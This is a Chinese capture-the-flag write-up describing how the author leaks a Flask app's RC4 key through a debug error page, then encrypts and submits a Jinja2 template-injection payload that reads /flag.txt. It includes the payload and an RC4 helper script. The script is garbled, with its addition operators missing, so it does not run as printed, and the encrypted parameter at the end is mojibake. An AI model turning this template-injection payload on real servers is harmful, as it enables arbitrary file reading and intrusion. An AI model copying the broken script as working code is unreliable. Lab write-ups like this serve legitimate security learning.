进入题目页面只有个Welcome To Find Secret,最后发现了/secret目录。
在/secret目录中得到Tell me your secret.I will encrypt it so others can't see。
顺着题目说的做,尝试传递secret参数。
发现如题目所说的,发送的内容加密了,但是不知道怎么加密了。
修改参数的值进行盲测,发现如果传入的字符串达到一定长度会报错:
直接在网页端进入报错页面,发现是flask的报错,显示了部分源码。可以看到是flask,python版本是2.7。
这里的加密算法使用的是RC4,密钥泄漏了。将所发送内容解密之后会被渲染,因此考虑到可能存在模版注入。
在网上找了一个RC4加密脚本,再次基础上输入密钥并尝试文件读取。
代码语言:javascript复制import base64
from urllib.parse import quote
def rc4_main(key = "init_key", message = "init_message"):
# print("RC4加密主函数")
s_box = rc4_init_sbox(key)
crypt = str(rc4_excrypt(message, s_box))
return crypt
def rc4_init_sbox(key):
s_box = list(range(256)) # 我这里没管秘钥小于256的情况,小于256不断重复填充即可
# print("原来的 s 盒:%s" % s_box)
j = 0
for i in range(256):
j = (j s_box[i] ord(key[i % len(key)])) % 256
s_box[i], s_box[j] = s_box[j], s_box[i]
# print("混乱后的 s 盒:%s"% s_box)
return s_box
def rc4_excrypt(plain, box):
# print("调用加密程序成功。")
res = []
i = j = 0
for s in plain:
i = (i 1) % 256
j = (j box[i]) % 256
box[i], box[j] = box[j], box[i]
t = (box[i] box[j]) % 256
k = box[t]
res.append(chr(ord(s) ^ k))
# print("res用于加密字符串,加密后是:%res" %res)
cipher = "".join(res)
print("加密后的字符串是:%s" %quote(cipher))
#print("加密后的输出(经过编码):")
#print(str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
rc4_main("HereIsTreasure","{{''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/flag.txt').read()}}")脚本中使用的模版注入payload为
代码语言:javascript复制{{''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/flag.txt').read()}}运行脚本得到需要传递的参数为
代码语言:javascript复制.
ä84mgË�¸
F;m®M5=[Ø7ê´A¿ÛhÏáa® ®yS*¢d|/�éY²Û ¶H=
#ñ[p®ni]vX不知道为啥,他的safe函数形同虚设,尽管提示了禁止的东西,但是还是没啥用。
做这个题蛮巧合的,传参数的时候打算放弃了,结果输着输着就报错了,这才有了后面的过程。
